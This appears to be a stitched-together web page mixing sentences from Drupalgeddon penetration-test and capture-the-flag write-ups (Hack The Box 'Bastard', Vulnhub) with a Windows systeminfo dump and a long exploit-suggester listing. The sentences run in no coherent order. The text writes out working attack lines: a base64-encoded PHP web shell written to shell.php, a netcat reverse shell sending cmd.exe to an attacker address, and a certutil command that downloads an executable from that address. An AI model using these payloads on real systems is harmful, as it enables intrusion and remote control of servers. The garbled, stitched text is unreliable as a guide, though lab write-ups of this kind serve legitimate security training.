It is currently the 150th most used plugin of Drupal, with around 45.000 active websites. Here’s a little tip that may come in handy when working with binary files. [*] Testing: Existing file (http://10.10.10.9/shell.php), [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php. Firstly, we can modify our exploit code to tunnel through a proxy in order to aid in identifying what occurs when we launch our attack: Starting on line 25, we’ll set $proxy_addr to our localhost and use Burp Suite to intercept the traffic. To carry out this demonstration, we will perform a penetration test on a … Let’s examine the nature of these vulnerabilities and discuss how we can defend against them: This machine is great for learning about Drupal, as well as the infamous ‘Drupalgeddon’ vulnerability. For now, let’s continue by opening up a listener on our local machine to catch our reverse shell: With our listener ready, we will return to our exploit once more to send a reverse shell using the netcat executable: drupalgeddon2>> nc.exe -e C:\Windows\System32\cmd.exe 10.10.14.52 443. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. The vulnerability occurs due to insufficient user-supplied input sanitization in the Drupal Form API.
Excellent, our scans promptly return the version information of the Drupal installation: In addition to these scans, performing file and directory enumeration against the target can also be leveraged to locate the version information manually. Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access? Two methods are available to trigger the PHP payload on the target: - set TARGET 0: Form-cache PHP injection method (default). In this writeup we will examine how to achieve an initial foothold by exploiting Drupal, two methods of using RCE to gain a reverse shell, and how to elevate privileges by abusing a vulnerable Windows feature. In this context, investigating the ‘CHANGELOG.txt’ file on the web server will also confirm that the current version of the Drupal installation is 7.54. With our executable placed on the target system, we’ll continue by opening up a listener on our local system: Finally, we will utilize our command execution to run the malicious executable and receive a reverse shell: Given that we now have access to a fully functional shell, let’s grab the user.txt flag! CVE-2014-3704 CVE-113371 CVE-SA-CORE-2014-005. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. In versions of Drupal 7, this URI is /user/password. A copy of this updated exploit will be provided separately from this report. There are several forms of this vulnerability that impact different versions of Drupal and many installations still remain to be patched.
While 7.59 fixed a lot of it there still remained an exploit through the user/registration form. It should be noted that ‘droopescan’ can take quite a while to run, but is a great tool all the same. # Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities # Date : 02-03-2012 # Author ... Drupal 7.12 - latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface. The Form API was first introduced in Drupal 6, allowing for the alteration of data during the form rendering process. Within Kali Linux, there are numerous Windows tools and binaries included by default. Contribute to pimps/CVE-2018-7600 development by creating an account on GitHub. If this string is returned, then code execution is confirmed. Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. In addition, it is also good practice for exploring how to achieve reverse shells on Windows systems. It is wise to modify the default configuration of applications when hosted in a production environment. Introduction: This is a quick post about how to hack this vulnerable virtual machine found on the Vulnhub website. We will search for Drupal 7 in the list of available exploits; here we will try Drupal 7.x Module Services - Remote Code Execution. With this in mind, it appears that the ‘Drupalgeddon2’ remote code execution exploit will be suitable for attacking our Drupal 7.54 installation: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb. We now have remote code execution on the target machine! CVE-2014-3704 CVE-113371. This brings with it a few new features as well as bug fixes.
For Drupal 7, it is fixed in the current release (Drupal 7.57) for jQuery 1.4.4 (the version that ships with Drupal 7 core) as well as for other newer versions of jQuery that might be used on the site, for example using the jQuery Update module. If taken in the right context, it is a slogan to live by. This tool will compare the patch level of our target system against the Microsoft vulnerability database to detect potential missing patches. Firstly, I can say with confidence that you will most likely encounter this type of obstacle during both your OSCP exam and real-world engagements. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. These property values affect the resulting rendering process and can be used to achieve an AJAX response from the API which serves the rendered requested resource. Here are several that are great for Windows systems: Windows Privilege Escalation Awesome Scripts (WinPEAS), https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS. Since droopescan is not working, we’ll have to manually figure out if these modules are installed. We’ll begin by spinning up our HTTP server once more: Next, we will return to our exploit to download the file from our local system and place it on the remote host: drupalgeddon2>> certutil.exe -urlcache -split -f "http://10.10.14.52:8000/shelly.exe" shelly.exe. So you'll need to set the value from the start. Walkthrough: First we do some network discovery with netdiscover:…
Once our script is placed on the remote host, we can use our script(s) in conjunction with manual enumeration to acquire as much information as possible about the target system. - Numerous API documentation improvements. For those preparing for the OSCP exam, the use of Metasploit is avoided if possible. You must be authenticated and have the power to delete a node. Services allows you to create different endpoints with different resources, allowing you to interact with your website and its content in an API-oriented way. Drupal faced one of its biggest security vulnerabilities recently.

[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.570 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.595 MB
Virtual Memory: In Use: 500 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. Personally, I tend to habitually compress binary files before attempting a file transfer. 9 CVE-2018-7600: 20: Exec Code 2018-03-29: 2018-06-11: 7.5.

C:\inetpub\drupal-7.54>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
19/03/2017 08:35 .
19/03/2017 08:35 ..
19/03/2017 02:20 Administrator
19/03/2017 02:54 Classic .NET AppPool
19/03/2017 08:35 dimitris
14/07/2009 07:57 Public
0 File(s) 0 bytes
6 Dir(s) 30.807.928.832 bytes free
C:\inetpub\drupal-7.54>cd C:\Users\dimitris\Desktop
cd C:\Users\dimitris\Desktop

It is crucial to ensure that software is regularly updated so that these vulnerabilities are patched. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. 7 CVE-2017-6932: 601: 2018-03-01: 2018-03-22: 5.8. UPX is a tool that can be utilized to compress binaries. However, it appears that we lack the ability to write a web shell to the system. Firstly, we will query ExploitDB using searchsploit: searchsploit Drupal 7. Great, searchsploit reports that there are numerous exploits for ‘Drupalgeddon’ available. Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2). If you found any mistake please let me know. - Logging of searches can now be disabled (new option in the administrative More specifically, this vulnerability occurs due to improperly configured access control list settings on the registry keys for the service tracing feature. This vulnerability was made public on March 28th, 2018 by the Drupal core security team in a security advisory titled SA-CORE-2018-002, which details a remote code execution vulnerability identified as CVE-2018-7600. This PSA is now out of date. If you enjoyed this machine, head over to Hack The Box and give ch4p some respect! I have been inundated with trolls around the world because of the latest Drupal exploit. Contribute to ferreirasc/oscp development by creating an account on GitHub.
Displaying 207 of the 207 vulnerabilities found. On Drupal 7 sites with the update status module, Drupal Core will show up as unsupported. Given that binary files can often be quite large, transferring these files across a network or writing them to a system’s drive can potentially attract attention. Exploiting Drupal to get a shell. Exploits found on the INTERNET. Reports about Drupal 7 vulnerabilities might become public creating 0 day exploits. Two of the best enumeration tools I have found for Drupal are ‘droopescan’ and ‘Drupwn’. Excellent, our binary has now been stored on the target system. Let’s check if our compromised user has these rights: Excellent! DIGEST DC-1 is a beginner friendly machine based on a Linux platform. There is Drupal 7 running as a webserver. Using the Drupal 7 exploit we gain the initial shell and by exploit … Preparing well for the OSCP is both a simple and difficult task, as the resources available are so numerous. Once we have acquired this information, we can feed the output into a handy tool known as ‘windows-exploit-suggester.py’. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). While this does not often pose a great threat to being detected, it's a good practice to reduce your footprint and the noise you generate whenever possible.
So far, we have achieved remote command execution on the target, leveraged this to gain a shell, and collected our user flag. In addition, there are a slew of other vulnerabilities for Drupal that may be utilized for exploitation. This vulnerability exists in Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1. Official community support for version 7 will end, along with support provided by the Drupal Association on Drupal.org. Enumeration Exploitation Further explanation on our blog post article. An attacker could exploit this vulnerability to take control of an affected system. However, given that our previous Nmap scan did not retrieve the exact version of Drupal 7 running on our target host, we will need to dig … The exploit generates a random string and attempts to have the target echo this string. Now, some of you hackers reading this may have alarm bells going off in your head right now and so did I when first discovering Drupal on this host.
Both of the tools mentioned can be found at the following links: https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester
python wes.py bastard_sysinfo.txt | tee bastard_vulns_wesng.txt
Windows Server 2008 R2 for x64-based SystemsAffected component: JScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110208CVE: CVE-2011-0031KB: KB2475792Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: VBScript 5.8Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2014KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1292KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1291KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: 
ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1296KB: KB2813347Title: Vulnerability in Remote Desktop Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Remote Desktop Connection 7.0 ClientSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-2013KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2730KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-0173KB: KB2685939Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows 
Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-0175KB: KB2691442Title: Vulnerability in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-1515KB: KB2709715Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4774KB: KB2758857Title: Vulnerability in Windows File Handling Component Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4776KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4777KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected 
component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100713CVE: CVE-2009-3678KB: KB2032276Title: Vulnerability in Canonical Display Driver Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121009CVE: CVE-2012-2551KB: KB2743555Title: Vulnerability in Kerberos Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20121211CVE: CVE-2012-2556KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2008-4029KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110209CVE: SPSRV8R2X64SP1KB: KBSPSRV8R2X64SP1Title: Windows Server 2008 R2 for x64-based Systems Service Pack 1Affected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: No more updatesExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: 
CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100511CVE: CVE-2010-0816KB: KB978542Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Live Mail 2011Severity: CriticalImpact: Remote Code ExecutionExploits: http://archives.neohapsis.com/archives/bugtraq/2010-05/0068.html, http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=13&Itemid=13, http://www.securityfocus.com/bid/40052, Date: 20130212CVE: CVE-2013-0073KB: KB2789644Title: Vulnerability in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-0075KB: KB2790655Title: Vulnerability in TCP/IP Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130212CVE: CVE-2013-0076KB: KB2790113Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120214CVE: CVE-2012-0148KB: KB2645640Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979687Title: 
Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: WordPadSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979688Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows ShellSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2745KB: KB2378111Title: Vulnerability in Windows Media Player Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Media Player 12Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2746KB: KB2296011Title: Vulnerability in Windows Common Control Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-2742KB: KB2207559Title: Vulnerability in Windows Netlogon Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100209CVE: CVE-2010-0026KB: KB977894Title: Vulnerability in Windows Server 2008 Hyper-V Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0024KB: KB976323Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0025KB: KB976323Title: Vulnerabilities in 
Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code 
ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-3223KB: KB2294255Title: Vulnerability in Windows Shared Cluster Disks Could Allow TamperingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: TamperingExploit: n/a, Date: 20101012CVE: CVE-2010-3227KB: KB2387149Title: Vulnerability in Microsoft Foundation Classes Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: Remote Code ExecutionExploit: http://www.exploit-db.com/exploits/13921/, Date: 20120214CVE: CVE-2012-0150KB: KB2654428Title: Vulnerability in C Run-Time Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120412CVE: CVE-2012-0151KB: KB2653956Title: Vulnerability in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: 
Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0013KB: KB2584146Title: Vulnerability in Microsoft Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0008KB: KB2778930Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: http://www.exploit-db.com/exploits/24485, Date: 20130108CVE: CVE-2013-0005KB: KB2736418Title: Vulnerability in Open Data Protocol Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET 
Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core 
Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4786KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100810CVE: CVE-2010-2555KB: KB982799Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100112CVE: CVE-2010-0018KB: 
